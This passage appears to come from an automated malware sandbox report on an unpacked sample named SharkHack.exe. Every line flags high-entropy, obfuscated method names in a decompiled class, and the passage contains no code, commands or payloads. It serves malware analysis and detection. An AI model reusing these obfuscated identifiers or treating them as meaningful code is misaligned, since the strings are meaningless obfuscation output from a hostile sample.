                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, Sj1QuemkrWd6ods55g5.csHigh entropy of concatenated method names: 'k3jm3lnSAg', 'obZmPBFwyZ', 'zHLm4Yif3b', 'ornmBOoKbh', 'PV0mHt5Ko4', 'ri6mqTQ8Zr', 'zQhmnbVMsp', 'lLwmMmDGeA', 'HUEmONQdQc', 'lYEmlpmyy1'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, EvLC0Q6fDXC9d2NcO4o.csHigh entropy of concatenated method names: 'y3SIkriOfA2KxP9yaHuN', 'arfgFciOofuVSo0DV4eY', 'NWYiZbiOROCW9bNxAZHX', 'aWiKCUIsS0', 'EwieORiO3xCusB1DVtIB', 'ygdo6uiOuCx9hULq7qh7', 'ISh7HJiOy2HIhZtwrBAj', 'TquYKdiOPcX1Aj7gXqsg', 'DZfUSaiO4DBX8r6Zeb8V', 'xKqsiD8u3C'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, Esh3jMt4FQd8EuEcSY6.csHigh entropy of concatenated method names: 'VGvtTFGjTO', 'cEKtbTyM3q', 'Xy9q4AiyHD7CLMRiAv2U', 'MF2cTwiyqJeP2krRrIlA', 'ookZbNiyn9RLtg47eWhc', 'CRTt0cUVay', 'JNexX6iyQo3L3NJyNow4', 'B9u0jOiySwt1C8cntHrX', 'L6e4J4iyOFVU8uXvPTil', 'qT5TUfiyl5h8KMiTPq8i'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, EBncGytpUf7ZoU29JqB.csHigh entropy of concatenated method names: 'wvNte76lp3', 'niMtVlqSSy', 'NmhRGfiyVrpkZyBArs5i', 'Up84u1iyGUMhqBXsusD3', 'NFLXdDiye01l8WgZYKpK', 'JJcgwCiyfCG0LZApkqVA', 'l5cBObiyoD2sb2TU2Av5', 'HDyOKUiyRkDhhc33Rbc5', 'FNDM1OiyNGjqiP33ORvJ'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, UeWumTDlK933ofbG6jP.csHigh entropy of concatenated method names: 'gB9DLX5NQc', 'vLSD0KLgdO', 'htrD5rWuSP', 'sbplPXiSWXJu29LxVB5h', 'gTASKLiSiOSYqebOcccs', 'mLhsouiStfFFuKi4HrKM', 'oDjxBbiSFptQTSjZTGAj', 'OSuDSaGGl5', 'UeRDTmJQBI', 'IIgDb6JMCF'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, eVUBXyvd37EwvnNnQ3w.csHigh entropy of concatenated method names: 'CavvFG0FDl', 'pNkvAcYLae', 'a9pCrfixZT49uu9BFDBu', 'wdnQfBixbS19PQGc7ESs', 'I1jTKdixjHWGedalSfg1', 'cE88iqixLy9BPo0HNdJZ', 'eaMpc0ix0w8XESSGnrXk', 'P79vtVxsVD', 'trYP4uixl0SxlvZf0vYS', 'nIJxV3ixQYytgjNfWNg3'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, XIXVg9Q4KO9xqy9Xlbs.csHigh entropy of concatenated method names: 'tulQH6wJbp', 'N7rQqNpbhP', 'BfoQnQBTiZ', 'MI2QMYQ6lW', 'RtyQOOX1Vw', 'J2OQlQ4D6A', 'VcaQQKlZUR', 'GMlQS7HGxf', 'oBPQTQ2B4C', 'EfJQbgXCdI'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, frDJOLlZoeZGEdrZ1X3.csHigh entropy of concatenated method names: 'XliigodMXAr', 'g2Zl0gXKQq', 'xUEl5YkAOK', 'vEll1leoOa', 'XaAKgdiIknsVbxCZthlQ', 'vFqF6SiID0CUrqC73OZj', 'irenp7iIpXSUSUpBaqG0', 'wev5NliIGT2VkybVCcSE', 'oivCBLiIexobAjtRJxlb', 'cQX62AiIVDVxa9ObPfr7'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, KJh8exWND6ZcWOnXuQd.csHigh entropy of concatenated method names: 'RmUWbhpRRv', 'G1hWjdJwxO', 'c6RWZuUcWV', 'nSGE8ri3OFPsQ7NiPeL2', 'PFXMt5i3lWSCXkoPdUTx', 'I1tuExi3nspSDs7SJ772', 'LDt2BHi3MQ6Z8stu2KOR', 'kGcWy8WMmj', 'OgQW3msGEa', 'EHbWPdhG4d'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, Pca9G84gUl1B5pJt88W.csHigh entropy of concatenated method names: 'fP642BYqwe', 'oDt4U3esgt', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'uGk4JxEYO8', 'method_2', 'uc7'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, YtOS3uAjHPjvm6LamqB.csHigh entropy of concatenated method names: 'D4OA19MnMb', 'Tgt40Hi4xk75sebcqV1K', 'l97pIpi4XyljXqYs0RTJ', 'quer0ei4v9fexOkMej5u', 'Y0m9Vni4mEFrf4u7OmrA', 'awViRQi4C2niTnAgF7PD', 'U1J', 'P9X', 'gB2iFrdx1H4', 'r8niFYKCt9g'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, dtCayJyaOGx5LEOmbnx.csHigh entropy of concatenated method names: 'hRpy87pyrI', 'rgLyXJNn9s', 'xrvyvZlRVY', 'kBbyx5RX3D', 'z9aymVHYtV', 'h430cVi0MT6GB8bp0Oax', 'e0M4URi0qse9OOyw5K9m', 'Y6054Ai0nZApwL0AwoES', 'DcE4iKi0O2QqbuAEyXFN', 'HY1BgKi0lF3JlOEUFCko'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, j2x2Sff2hRDpqR2f5OY.csHigh entropy of concatenated method names: 'bZef4EuTZo', 'RWyfJpZ60i', 'JjSf739fAQ', 'EXUfK9xQdm', 'YsdfsrIDJe', 'V3sfrKcJS1', 'x0QfYm0CRu', 'zlqfhQYeeN', 'xi9fkH9VTu', 'YvifD2lyvG'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, nbUq6oQvQdMCN2Hs7at.csHigh entropy of concatenated method names: 'Gc7QmrQD96', 'NDxQCEet1Q', 'lusQzVbVTA', 'NDKSdJaVcp', 'MrwSi66YFg', 'dytStV5WeX', 'DlcSWH8pOM', 'YpISFqi8LN', 'HF6SAahAIr', 'LFVS9hTlvS'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, xH9QInGrC59cxP8qDW4.csHigh entropy of concatenated method names: 'ctAO1iibcuOOhCAKxCPQ', 'Dw8LkQibg00Z3KRF7owu', 'U11kqkibAmMmrhJZIvmM', 'nfY5ibib9KkgKwFVplie', 'method_0', 'method_1', 'rE0Ghwiuev', 'WRqGk09NyA', 'B8yGDr3jgp', 'W6IGpW2WgQ'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, kmhB7lqwmHUwLGJmKu0.csHigh entropy of concatenated method names: 'CZDxByiE8077frUYJsAW', 'tBtXZPiEaWEUuowfrQZ7', 'jxGgg9iEI46V6499lLqe', 'SreqagUmRA', 'Mh9', 'method_0', 'r6qqIKuoZ3', 'FgVq8ZdeRF', 'oHCqXA0hs7', 'N2eqv9P9EL'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, hZYSeB4xUMHfeUYaw62.csHigh entropy of concatenated method names: 'U6u4CvfqOS', 'Inx4zFDjCM', 'zGDBdWb0RJ', 'bixBiavytf', 'kHQBtll121', 'bXDBWs5g1w', 'Rpx', 'method_4', 'f6W', 'uL1'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, O95YsE9qy1W69aUchol.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'Alwig2UkaYK', 'emDiFi8Sspd', 'UN9Q5IiBBJW23Kx38LRA', 'SCYp8tiBHgv2IeodXskq', 'iWbJGGiBq1UWJUeMpV5x'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, oMw4Viojjr8FPG6vReH.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 't3LoLsW6Xs', 'Irqo0KQ6xZ', 'Dispose', 'D31', 'wNK'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, HrqOLvcDQCbwN14G5yu.csHigh entropy of concatenated method names: 'Ericyj5b5T', 'PN7E2BiHyvq620MKAr0X', 'Bq5ZkPiH3QxMoE2s46eZ', 'VPGGxaiHN21wEqe10crR', 'IHm6uoiHufYvs8LaRGTu', 'kGBgpOiHPTLM3WXm9LCb', 'fdAcGvYvKy', 'zZwcexr3rj', 'Q1LcV0AnGu', 'JTAcftioV6'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, Xx42aTN4NyQdEJlZivE.csHigh entropy of concatenated method names: 'method_0', 'AEUNHx7mlM', 'NWqNqL01L2', 'uQ0NnuYY7u', 'dyVNMe95EV', 'I0dNOKm6gM', 'm2eNlB2Ekd', 'eWrFGfiL9HdiVh6EmYUH', 'o4bu93iLcCdgP9loVENc', 'jFHwN6iLgUQvBeJYRisc'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, pUIXWIqOCHR9wOxYaox.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'LdyqQHoAU1', 'WmqqSZctKi', 'bxSqTeNP9V', 'Ajdqb9Rnyk', 'bYyqjOhkCi', 'IyLqZS3glN', 'yBmCQ4iEqUsv8exxUdaO'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, pS5VWSiIe7h1sjvCDva.csHigh entropy of concatenated method names: 'P9X', 'z03iXI6LFe', 'ABNigd3qUPs', 'imethod_0', 'oVtivQfkKW', 'Oiph8diuwSj5qvdu1xK2', 'qhdcBaiuEEK1lEPOKOmC', 'KhF8UAiu55LjgvwngnW4', 'tYYfRyiu1CMZ4oQCYtwF', 'SqrceLiua0PGbxReinwt'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, qW8DReFRKfdEuJS2l55.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'ahkigWCtEhv', 'emDiFi8Sspd', 'pG1yGsiPDieYox0Eb89n', 'CyNlIuiPp9soMlbFryOv', 'Rk43HdiPGlqwUOA1V1yT'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, fZTkO09orwlYpJw0agv.csHigh entropy of concatenated method names: 'V4n94dxbnf', 'MJ1f15iByj46X11DKBYu', 'AnWq36iB33rm6YZMt0AJ', 'yN6UMpiBPCiAwpI9h0v4', 'E94', 'P9X', 'vmethod_0', 'nvGiFpRUWeJ', 'XBNig6v3YIG', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, xWrfjGe7y11IxF2Ve4q.csHigh entropy of concatenated method names: 'sVwfiZlqpO', 'joUd0WijsqNpjLtbZZuZ', 'IyVuL6ij7vpncKOPnJ1B', 'kaPhYeijKfOgRfKo8D6k', 'a3vesu7qaJ', 'uiuerihOxX', 'mISeYJ5Euj', 'OLJehU9yKl', 'aQgekVW6Ao', 'y0geDl3EkV'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, C0CLCEBGmfMtk1KjCNJ.csHigh entropy of concatenated method names: 'b2KHKLol5Z', 'DV89Zliwn6dSou575Og9', 'PQVUQbiwH3jHZ9JX5Qwa', 'w9BDwCiwqfxPFBItGCtj', 'TG6IA5iwMUymyG5Y1oZ7', 'kt5', 'qK6BViJVbu', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, ali708plKM6Ni0289eD.csHigh entropy of concatenated method names: 'N2N', 'HYTigsLWGKH', 'qKMpS0HIxi', 'RREigrLD9HM', 'nXKamkiTFKWS8B4BOMLX', 'hXP0LyiTAR68QUZq5h73', 'kBMBAHiTtqvUDdIl88SQ', 'LvusYXiTWSrAbUv9BOlE', 'zY6ZoeiT9v0mrVZwpFY2', 'xyRdffiTcGhcM471lY4V'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, vbJysBiKR1qvJiGrKqe.csHigh entropy of concatenated method names: 'pRBir33wN1', 'RoyiYrH1K6', 'R2Wiht9r4f', 'kl944xiuYB7TT1l5Inm8', 'PqXV1cius1YWmrOA7p7b', 'mqvUu0iurlLbT1HcsgM5', 'kyv6j7iuhuSX5vtcZ82L', 'KPF2ctiukq6aupc4PZPU', 'CdfZAPiuD4ZPEOjHMXqN'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, aiivD1jFb3ZoBVhwvH.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'NUbL9SjsI'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, avWVKRHwOK5QhelB7wy.csHigh entropy of concatenated method names: 'DQyHasOjw5', 'k6r', 'ueK', 'QH3', 'blfHIDWCe2', 'Flush', 'mxCH8Vielg', 'lOYHXXeK0U', 'Write', 'oTpHvKIfXZ'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, bjUD4qciiGm35ihtVho.csHigh entropy of concatenated method names: 'lqlcWgBqO2', 'FOAcFJ3uEm', 'A1bcAK34IE', 'pyUyeMiBX2jZNNoWl7eh', 'lNct3CiBvT30lAx0cwCN', 'NHTALFiBxln8KeaJZ4y4', 'KcUy90iBmHsdoDGLHTGM', 'h6EDLLiBCQ6UpG9pQLt8', 'COuvGniBzuCYUS2gaTE3', 'WiGUN0iHdpt8PpelCcST'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, KBLMFH6KkAlYsgGtW00.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'LWMejdinRTJ496yh7B5U', 'vcQ8i2inN0XuciRBB1II', 'Y4KF5qinuvF4uav4o1jb', 'h1F6r791Tl'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TOBrL6X7YwccS2N0NZJ.csHigh entropy of concatenated method names: 'zm0XrQUEr3', 'qwEXDtttrI', 'ihZXeZIv5Z', 'GORXV39K91', 'sifXfoxlyj', 'eiYXoBKEY7', 'DtaXRTXFRo', 'cOjXNREx1h', 'Dispose', 'G5dOXFixcj7lHY6Xsmkg'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, CvBTB634WJbsbdNk0HA.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.csHigh entropy of concatenated method names: 'rsb58CimF39qL8auIGBi', 'TOuEQdimAEilESGTAkdn', 'yeQxIiQa2f', 'K96RrXim6imBPBYuaCF6', 'yhOIVoim2WXPyNieqygP', 'nfyYlsimUrQICBGa8YRe', 'aVlhK4imJMpY9cmF3OgL', 'dCVYgnim7gcRxUENV4Dj', 'I4IeUAimKMeEV4QD9Q8S', 'LceNI4imsVEybgty6fnA'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, eufhKGg27Q7RWQ163S4.csHigh entropy of concatenated method names: 'y7AgJ47Ibb', 'lSCg7ih3wl', 'uIegKhUsFe', 'y6RPLViqggMjEGrIc45o', 'mM5C0diq6qNG3SZCugTD', 'rn4QOaiq9cVuJYaDvD4K', 'glm8ckiqcsVZJNUXXj7g', 'fLuOxDiq2AQSK1wN9g0n', 'HRtSOjiqUHNyg4RVtdpu', 'KfWc9viqJKlWKEraPRGL'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, njrujeAENEBnoTwLEll.csHigh entropy of concatenated method names: 'gORAxKvssZ', 'pPxAmA6eHe', 'HFZACYZWUP', 'MEPAzuvJVK', 'MZL9d5qASX', 'oBD9ig3hBF', 'sT19tBjD21', 'LVbTJ4iBcmQBOH8J7rTk', 'J5wk1HiBA0PX4UymQGsi', 'Pu09Q1iB9hTPmfcv6so7'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, enykyluTt8tntLMmTmH.csHigh entropy of concatenated method names: 'OLMumRSCYl', 'XkeuzjtoqW', 'kCJuj7fe2v', 'mfHuZbqKI1', 'iFiuLxc6SV', 'RuFu0QjAeB', 'RXeu5biLrD', 'sjxu1ADZNe', 'Y7xuw2TJJt', 'ubguEMjAkj'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, M6XlSeiCbULdwXerUj5.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'nJMigi5FRve', 'emDiFi8Sspd', 'XadkpOiuvpGcqrg9hvsX', 'DF2j12iuxB4Pj4VPlrd3', 'jpUPFAiumHrEqj8EeZMR', 'EtDRnJiuCOSlpFltrdUo'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, t0QDrItwOiM5sAdQ4F5.csHigh entropy of concatenated method names: 'lExWcRDgrw', 'KolcrCiyX5CWwth6sTBe', 'juj3y4iyvb1nOjAXfwVa', 'ESwdv3iyxydv8mZDkLjs', 'uxtEA3iyIA53mwnTtkcB', 'puxb74iy8SWxkNxoF1ko', 'Ns2MNsiymU1qRnHgXnIi', 'RmGB4IiyCfOVAqujobat', 'U3PWd1dYbZ', 'iUiWtNZQ5Z'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, W367m4PC7kPOgq5eVvx.csHigh entropy of concatenated method names: 'R3g4dwI4oQ', 'uMc4iKEW79', 'Yd7', 'SMu4tbhN0y', 'CxB4Whs2Hm', 'vkW4FKlUk5', 'Qpg4AR4uil', 'r63Rrhi15A1msADN2QPG', 'veC1RPi1LKxFDkV04pDI', 'YVi9oci10DmbNJMWq76s'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, K3EvFZAQXLSG11lHyGN.csHigh entropy of concatenated method names: 'q64', 'P9X', 'D4BiFKx8wfY', 'vmethod_0', 'YDaig94u3Hi', 'imethod_0', 'n51hkKi4ZU9a8MVyWaVu', 'oWnesRi4L3xrcrtSsKuA', 'UZotk0i406BJ1BiNUuqY', 'hDiIvdi45gODyG82NnTk'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, j85yTp6tKZORN4qjSRA.csHigh entropy of concatenated method names: 'xOV6FQR8AC', 'xnT6AxoVa9', 'R0B69aWJWa', 'Iny6cYJnFR', 'Sdx6gEr1t8', 'pTH6661VtQ', 'ojD62cBUDt', 'OL56USE3J5', 'Wdk6J6oG7a', 'G3J6772WP1'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, ONP1BPc6cApGusCcp5X.csHigh entropy of concatenated method names: 'EZMcUbtrsd', 'DHxcJ1RUq7', 'fM9Tl2iHFmaypPPjn0QJ', 'neRT3KiHtLYNcxjoQLaI', 'T8Ql6FiHWgdF2BXHSgGw', 'WVyjOXiHAoagRkcrDVCt', 'F50sYGiH9gTkGZwXhHfJ', 'eJljkFiHcqRNLyYjru4M', 'L4UnEjiHgumuesN9t37e'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, CdKxLo9TWUhYReDFyxB.csHigh entropy of concatenated method names: 'YAd9Xs9Qrk', 'WTG9vFl8cd', 'hU19x0ovVn', 'a8U1UPiBaR75mNMVM3rs', 'eiMjpIiBIXpVDpW1Wwg2', 'cmdZSQiBwGXUeVguP741', 'Heo1juiBEOY4hffS6TGV', 'o869j9psnq', 'EbA9ZZoBWW', 'QiZ9LVZXA6'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, doZtkVpKf8U8WppqJbu.csHigh entropy of concatenated method names: 'Gw4pp3Mn2I', 'msUsMSiSZtYCWhASMk1r', 'TSOv3EiSbiimwTjCU0yD', 'v02dWiiSjuj7HvgVQXuQ', 'Y5yprX0fLJ', 'G5CWGdiSOhW3J5malMtj', 'eoji8piSnwH4C7qwDQV2', 'UpXuYYiSMNQ3seLk7dnD', 'lpuy2aiSlA7vxNiYqGdc', 'HEILSoiSQCTwHyWRkVui'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, kBmXH9l497Qp6LWRqH1.csHigh entropy of concatenated method names: 'GSIlHslRdW', 'SMNlqwjkfL', 'DrnlnckADm', 'rY3lMcjsHs', 'MrrlOa28aA', 'VDCllhn4oQ', 'Ci8lQ4iZXB', 'KxjlSwlAAN', 'hswlTLLiGM', 'QWPlbB559Z'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, tkqlLoFQh50kIsJmFdn.csHigh entropy of concatenated method names: 'CTTFm2EQPu', 'KdxrEQi4WA4KGGA83aKp', 'dqXN5Hi4ibkkuNYfDSvL', 'E6ZRdRi4ts6Iix85QWAo', 'i9fy9ti4cjyxOXU8ieh6', 'Td5Anxi4Afx43aKysD5w', 's3ShvRi49lu3FMYVCs6i', 'cN9EIei4gOBIhPdWyacg', 'nLFA9k83yW', 'bbjkHli4JYNdegpEhNMR'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, j5ldwtDysIL7AmxK4MB.csHigh entropy of concatenated method names: 'GaTDMYN2FP', 'VKvEGQiQ8CH8PauAgAHw', 'SqPmOtiQagjD9embqkAh', 'CHxV7NiQIDbAHo8ICewc', 'vN4WWgiQXqugIxVQLrFp', 'KjeDP8M6tr', 'tqmD46PADe', 'ykBDBQrvD3', 'bwDlvPiQ56JXxAKauqSr', 'r9E2S3iQ1cnB9ncuPPve'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, E3o6QD3SlpgCyI5E6Rs.csHigh entropy of concatenated method names: 'wDH3bq90Rx', 'JZL3ji9pIL', 'lQt3ZkJW6A', 'Y4p3LsC6yh', 'o8c309LfPh', 'A1i35O5Lww', 'fEH31ZakHP', 'Lsx3w3EgsL', 'QKs3ElUcCV', 'fR93aP2Xec'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, to79D6fEqAGFyBNeY0p.csHigh entropy of concatenated method names: 'PX4fIii4Kn', 'GwPf8WdyJi', 'bpOfXlh5Ya', 'XFSfv2EsJL', 'z10fxyxMwW', 'nfZC49ijOPoRTNLsNB4B', 'vY8Y7HijnwHbdBwefhK3', 'TPciraijMI3fsfiyCJmi', 'XU0bY6ijlLmm86iu86xI', 'TOCFUXijQT8BYiGUxr3x'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, WTs7qahlV64qvKrIvj.csHigh entropy of concatenated method names: 'SkHq1dNMd', 'LMKXHviNB3wuhWF9puNX', 'S1P3fXiNHTv2qmCPkFkg', 'RQr4I6iNPxBceHs4cSvL', 'pvoKTViN4r8YILC0F5xr', 'oEhDjiANh', 'f6kp1TRE4', 'vRxGQlJfG', 'VYGeQhudC', 'mi5V1AwRD'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, XnJrhIl69rXGORX84dr.csHigh entropy of concatenated method names: 'JnhloxK0r2', 'fSlPwQiI9Tksvp8rHrS3', 'Nt8lfHiIcFdrHeMunqZF', 'WZH1YpiIFdERgFh0UODh', 'gIdShDiIATrpcxeHHZYj', 'fHq5asiIgCiCGPBRDysK', 'IPy', 'method_0', 'method_1', 'method_2'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, EHXH4ePZVLGwViqivQ6.csHigh entropy of concatenated method names: 'Ky5P0IYQns', 'GcpP5pcIhd', 'xljP16IuaG', 'VycPw2NSUm', 'YQiPErtfw7', 'EVMjAsi1nKmsoCXQoJ3I', 'ybi7Lfi1MuYsYs3TH0qZ', 'JV6mGwi1OGb9ZNpPG7W3', 'QT4CV7i1HwtKnnNeM6bb', 'bgZGPxi1qZga6oWa9owa'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, JALrlWcMr32WYbVn0It.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'MQXiFff14W8', 'pgjigUnOEKY', 'imethod_0', 'LJABcoiHbx3Msjd5RMSk', 'VyTnnXiHjR7qM1FcpXIZ', 'RHvSmEiHSaGejFE3GaGv', 'jWq1hkiHT6atkWG94NmV', 'avIA4biHZMnSrWMoLXdc'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, DxdlsJWwhGQkGc7gyLW.csHigh entropy of concatenated method names: 'k7xFWTgw8K', 'IXGFFg6IfQ', 'GvrFAPWVNK', 'VUCrZDiPdqC32dlULga1', 'yHwQGeiPiA82vx35pHQH', 'nhb6dGi3CbGnHmdEtle8', 'M97Kk5i3z9k4kNGNNwbb', 'e2JFU72eOl', 'cweULTiPAlIkIhUI0L3S', 'zqNlKAiPWeOyONNmQoiG'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, qWmkX1X4jrPDrUUx6M9.csHigh entropy of concatenated method names: 'curXHHtjBT', 'wysXqMKiDy', 'qiKXnX6hRk', 'vn1XM2wFd3', 'Dispose', 'eGwa8PixYUNNGZRoV7fh', 'PGCNvPixsNNGbGGLhbY1', 'wyRMcXixrJcaDnHwiFOl', 'lSuue9ixhfMhihBvP5hc', 'eE3XyjixkFy9jBYXtAvO'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, rGEnirI4PkjmAkeSbof.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'UniIHxoqeV', 'q1DNRciXPAiwqPfbBuXw', 'IH2pfEiX4kOIPLEpmfwq', 'w2aU2ZiXBA4xr0Cspiqc', 'E4mmKpiXHFGyfev9LXmL', 'AHhLH0iXqlCtytBNQ8dn', 'TixsTOiXnYwt6UEpf5pf'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, PQrxBjIODNycEAnm1rG.csHigh entropy of concatenated method names: 'pD6igNlvNVY', 'pgVi9R7L4Mu', 'TekrS0ivWxZkxmDwwQaK', 'S0PgjmivFAKdWkkpFtFL', 'eW0fqkivAwXEdR4PNAaf', 'wfcIUIiv6KgySMi8nyMd', 'uIbeHUivcgfW8UhQFrd2', 'FoJAx4ivgqK0KW0AHBX8', 'dqpFYeiv2O9wmRFbIu7E', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, PLaouIpXWde9VO39AvE.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'g08pxWXGVJ', 'MbgigkTKIC1', 'mGLcf9iTVgmIgkly0GsH', 'DIHEaOiTGfK374jPwlbQ', 'KPnm40iTeBomsv4VoVmX', 'zi7UrxiTfGAGgWj3iSdD', 'vgCQWniTojm3Ed7de6Jc'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, ADxUWXcTm5fwO7hpxRa.csHigh entropy of concatenated method names: 'FWTcXAUNQm', 'F5IcvcXehI', 'RQPALIiHXTEww1HcNYOe', 'IrA80CiHIKvt7lGuj7x9', 'MQaKlIiH8QRQvOip87K9', 'kp1Nb8iHvwiVkq2tu0PS', 'LKycjJfciT', 'bcccZsmQID', 'FiMcLg9liF', 'hKJc0A1bDQ'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, apHiiOguZikCMHPSt2Q.csHigh entropy of concatenated method names: 'Ekdg3XsFqu', 'ocLgPLUfXW', 'xERg4Ul8GB', 'l7jgB03ODO', 'HAkgHaDEZn', 'C2ugqIHStw', 'bwhWG1iqO2lHWWH8NRgv', 'w8yosbiqlEPnQVH8bAk1', 'LSUJo3iqQEXD7j6VUPIl', 'FNjSRCiqS6SmZ8QRUOZg'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, psNs80sV3GoHG24hGi5.csHigh entropy of concatenated method names: 'rK6D761SuV', 'paCDKldvFP', 'qAXvlOiQ4Ec9ea6vS3yA', 'oHbijViQ3T55xvaqfXDo', 'vHpFwJiQPJiZg62EapsP', 'f6oPWEiQBaMf65g5ZECW', 'EGjDD7Vihr', 'ntSXbfiQMlhmg4j6YqVb', 'hnKrZciQqTPEYEPCLkoB', 'pk5x5BiQnSAn6r885X24'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, R8iwBJmQj5yJVN7ORn9.csHigh entropy of concatenated method names: 'cvsi9BLmhi7', 'MwZi9HY1wIP', 'n8Ai9qOi27q', 'v1ai9n5DKKV', 'C3Fi9M7sE6u', 'zmAi9ORNrIh', 'eO4i9lJrHc0', 'rgLCAoclPv', 'X7mi9Q6WV2c', 'm2Zi9SiupOE'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, cnVlqyHnmS6FTQws4nV.csHigh entropy of concatenated method names: 'Close', 'qL6', 'WrHHOZx8Hc', 'tWPHlXpT8O', 'pcUHQ42U8p', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, WqFy2NyLWpuB3vb1eE7.csHigh entropy of concatenated method names: 'Nu7y56rjt3', 'g7ay1Kjw10', 'XZTywWNiuB', 'L98Udni0R22QMappggOc', 'LED3hdi0NAdHfG12qnAu', 'UpJKL0i0uraoAf1lDWHS', 'nqR5YGi0yp9qQ1sd01vj', 'CIwRtCi03TrbYSAUaQ8t', 'kvSveAi0Pwku1NXmWCB2', 'VyOgc5i04N2bAwsFg3x0'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, h1V98lGUl2NtAlQaa4v.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'dK0igembaTh', 'hk6igVn0YHx', 'cwlIrNiTTHO9uET3kvEB', 'HW9GngiTbXsU8lUq8o2d', 'rQipGqiTjsGYUunpIorJ', 'c2JaF4iTZRVbWahr5aS8', 'RlAuG3iTLQyOYFkrBFyE', 'TQDGroiT0B34wBPPxI9T'
